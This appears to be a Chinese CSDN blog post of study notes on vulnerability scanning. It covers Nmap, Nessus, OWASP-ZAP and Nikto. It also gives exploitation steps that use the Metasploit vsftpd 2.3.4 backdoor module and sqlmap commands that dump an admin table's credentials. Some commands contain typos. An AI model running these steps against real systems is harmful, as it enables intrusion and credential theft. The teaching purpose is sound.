六、漏洞扫描

最新推荐文章于 2024-04-26 11:15:46 发布
最新推荐文章于 2024-04-26 11:15:46 发布
阅读量428 收藏
点赞数
分类专栏: 2019训练营 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50666634/article/details/125118240
版权
系统漏洞扫描
  • 漏洞扫描原理
    • 漏洞扫描器对漏洞进行扫描,以验证具体目标是否存在对应的具体漏洞。但也存在错误扫描,需要对扫描结果进行漏洞验证
    • 扫描器原理大致相同,都是通过发送对应的验证数据到目标具体服务进行验证。到收到响应与存在漏洞的响应一致时,就表明存在漏洞
  • 漏洞扫描工具-Nmap
    • nmap --script vuln 目标IP地址
  • 漏洞扫描工具-nessus
  • 漏洞利用metasploit
    • 利用Metasploit对扫描到的漏洞加以利用 以vsftpd2.3.4为例
    • Kali 进入metasploit
      • msfconsole(建议msfdb run)
    • 查找漏洞
      • search vsftpd
    • 使用漏洞
      • use exploit/unix/ftp/vsftpd 234 backdoor
        • 查看需要设置的参数
          • show options
        • 查看可利用的攻击模块
          • show payloads
          • set 攻击模块名–设置攻击模块
          • set rhosts IP地址(攻击目标的IP)
          • 攻击
            • exploit/run
Web程序漏洞扫描

  • 针对Web应用程序的漏洞扫描其实就是每个扫描器读取自己的Payload进行探测

    • Web漏洞扫描器
      1. Owasp-zap
      2. AWVS
      3. Appscan
      4. Nikto
      5. Burpsuite
    • 每个扫描器都有各自不同的Payload进行探测

  • OWASP-ZAP漏洞扫描

    • OWASP-ZAP是OWASP组织开发的用于Web应用程序漏洞扫描器。免费开源,不断更新维护

  • nikto漏洞扫描

    • 对目标服务器进行漏洞扫描。主要针对HTTP服务器
      • nilto --host IP地址

  • 漏洞利用

    • 使用sqlmap对扫描到的Sql注入漏洞进行利用
    • sqlmap -u “漏洞的URL”
    • sqlmap -u “漏洞URL” --tables (爆表,假设爆出的表名admin)
    • sqlmap -u “漏洞URL” -T admin --columns (爆admin表的列名,假设admin,password)
    • sqlmap -u “漏洞URL” -T admin -C “admin, password” --dump (获取对应的数据)
信安小白起飞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞扫描服务内容、方式以及流程一篇了解
Uguardsec的博客
12-23 3418
漏洞扫描是指基于 CVE、CNVD、CNNVD 等漏洞数据库,通过专用工具扫描手段对指定的远程或者本地的网络设备、主机、数据库、操作系统、中间件、业务系统等进行脆弱性评估,发现安全漏洞,并提供可操作的安全建议或临时解决办法的服务。具体服务流程、内容和方式如下:
漏洞扫描系统升级记录.docx
08-10
漏洞扫描系统升级记录.docx 漏洞扫描系统升级记录是信息安全中的一项重要记录,用于记录漏洞扫描系统的升级过程和结果。该记录通常包含以下知识点: 1. 升级日期:记录漏洞扫描系统升级的日期,用于追踪系统的更新...
漏洞扫描分析上 (下部分)
qq_44790964的博客
09-28 415
然后 我们可以ping一下 找一下你目标的ip 比如 然后看下ip类型 推断下他的ip范围 然后点击这里开始扫描 所扫描后的结果 可以去右击在进行扫描 或者编辑消息头 就可以了 这里是个注入工具 比如这个扫描工具 在这里扫描之后 在扫描之后的出来的问题右击 利用这个注入 就发到了那个注入的工具 把这块 添加注入的地方加进去 把那里选中直接添加下 就是相当于设置个变量 然后我们默认开始...
kali漏洞扫描 并输出 报告
最新发布
zengliguang的专栏
04-26 880
您可以根据实际需求选择合适的工具进行漏洞扫描,并通过其内置的报告生成功能生成详细的扫描报告。在使用Nmap进行漏洞扫描的同时,为了便于后续分析和分享结果,您可以生成详细的扫描报告。OpenVAS(Open Vulnerability Assessment System)是一个开源的、全面的漏洞扫描框架,提供了友好的Web界面和丰富的漏洞检测插件。生成的HTML报告将为您提供易于阅读和分享的格式,包含扫描摘要、目标详情、端口和服务信息、漏洞发现等内容,便于后续的安全分析与决策。
漏洞扫描是什么?什么工具及有哪些特征
白帽黑客佳哥的博客
12-06 1148
作为一名资深网络安全专家,我在漏洞扫描领域有着丰富的实战经验。在这篇教程中,我将分享漏洞扫描的流程、分类、标准、方法、工具和案例解析,下午对一些新入行的同学有些帮助鸭。
漏洞扫描技术
m0_65471360的博客
06-25 1529
在现代网络安全中,漏洞扫描是一个关键的安全问题。漏洞扫描是指利用一系列的程序、方法和技术对被测系统或信息系统进行全面的检查,并根据发现的漏洞信息,采用适当的方法,向用户提供有关安全信息和解决安全问题的建议。漏洞扫描的目的是为了查找系统、信息系统存在的安全漏洞。目前,国内大多数单位都采用静态和动态两种方式进行漏洞扫描。静态扫描是指利用事先编写好的程序和相应的测试模板,对被测系统或信息系统进行全面的检查,得出系统或信息系统存在漏洞、缺陷或不足等结论;
【网络安全技术】——漏洞扫描(学习笔记)
HinsCoder的博客
04-10 1383
随着技术的不断进步,漏洞的发掘水平和速度在快速提高,与此同时,漏洞的利用技术也在不断发展,尤其是利用安全漏洞的网络攻击事件频繁发生,正在遭遇一场前所未有的漏洞危机。
网络安全-漏洞扫描.ppt
05-25
1 计算机漏洞 2 实施网络扫描 3 常用的网络扫描工具 4 不同的扫描策略
Python脚本实现Web漏洞扫描工具
09-21
是去年毕设做的一个Web漏洞扫描小工具,主要针对简单的SQL注入漏洞、SQL盲注和XSS漏洞。下文给大家介绍了使用说明和源代码,一起看看吧
主机漏洞扫描记录
01-11
主机漏洞扫描记录 本资源主要介绍了主机漏洞扫描记录的内容,包括扫描结果、漏洞等级、安全等级等信息。通过对主机系统的扫描,发现了多个开放的端口,包括ftp、www、epmap、netbios-ns、smb、Cifs、dce-rpc、mysql...
rpc漏洞扫描
04-07
漏洞
nuclei 漏洞扫描工具
05-06
nuclei 漏洞扫描工具
漏洞扫描工具大全,零基础入门挖漏洞必知必会
youmaob的博客
01-24 1473
漏洞扫描工具大全,零基础入门挖漏洞必知必会
5 款漏洞扫描工具:实用、强力、全面(含开源)
热门推荐
YF云飞的博客
08-03 4万+
5 款实用漏洞扫描工具概述&安装
漏洞扫描(又称漏洞侦测)
weixin_40191861的博客
05-03 625
漏洞扫描一般采用一种规范的方法,通过对系统或网络设备、软件、编程语言等进行检查,来确定它们是否有潜在的漏洞和安全性弱点。根据漏洞的复杂程度和系统的安全程度,漏洞所测可被分为应用程序漏洞、操作系统漏洞、服务器设备漏洞和网络设备漏洞等。漏洞扫描,又称漏洞侦测,也称为“漏洞脆弱性检测”,是指一种网络安全手段,通过识别操作系统、网络服务、软件和其他系统中的漏洞,以提高组织的网络安全漏洞扫描可以帮助管理者识别系统中潜在的弱点,从而有效地提升网络安全,并及时更新相应的补丁,减少恶意软件入侵和病毒攻击的风险。
开展网络安全漏洞扫描的10个关键步骤(附零基础如何自学入门网络安全
2302_76672693的博客
07-27 1130
开展网络安全漏洞扫描的10个关键步骤(附零基础如何自学入门网络安全
简单实用的漏洞扫描工具!(如何给单位做一个渗透测试/网络安全测试)?(๑•̀ㅂ•́)و✧ 演示篇
寻觅的博客
08-06 4681
介绍 国内网络攻击数量不断增加,而很多单位使用的系统都是缺少维护的老系统,存在很多安全隐患。我介绍的这两款工具对非专业人士也非常友好,因为他们都具有下面几个特征。 完善的可视化界面 全面的本地化(全中文) 有好的报告生成系统 简单的操作 Goby 下载地址: https://cn.gobies.org/ 此软件功能类似nmap,主要针对服务器扫描,查看目标主机是否存活(在线)开放了那些端口,运行了什么服务,并且会有一些探测去检测是否存在漏洞,这些操作通常也是网络安全工程师对目标检测的第一步,扫描目标都
APP漏洞扫描用地址空间随机化
weixin_33834075的博客
12-07 363
APP漏洞扫描用地址空间随机化 前言 我们在前文《APP漏洞扫描器之本地拒绝服务检测详解》了解到阿里聚安全漏洞扫描器有一项静态分析加动态模糊测试的方法来检测的功能,并详细的介绍了它在针对本地拒绝服务的检测方法。 同时,阿里聚漏洞扫描器有一个检测项叫未使用地址空间随机化技术, 该检测项会分析APP中包含的ELF文件判断它们是否使用了该项技术。如果APP中存在该项漏洞则会降低缓冲区溢出攻击的门槛。 本...
渗透测试---漏洞扫描
孤的博客
10-01 942
Nessus Nessus 是系统漏洞扫描与分析软件,非常强大。 官网下载: https://www.tenable.com/downloads/nessus 然后安装。 openVAS OpenVAS是开放式漏洞评估系统,也可以说它是一个包含着相关工具的网络扫描器。其核心部件是一个服务器,包括一套网络漏洞测试程序,可以检测远程系统和应用程序中的安全问题。 OpenVAS是一个客户端/服务器架构...
第四章 漏洞扫描.ppt
12-18
漏洞扫描是一种对计算机系统进行安全性评估的方法,通过扫描系统中的漏洞,帮助管理员及时发现并修补系统中存在的安全漏洞,从而提升系统的安全性。 在实施网络扫描时,我们需要了解漏洞存在的原因。网络安全漏洞是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值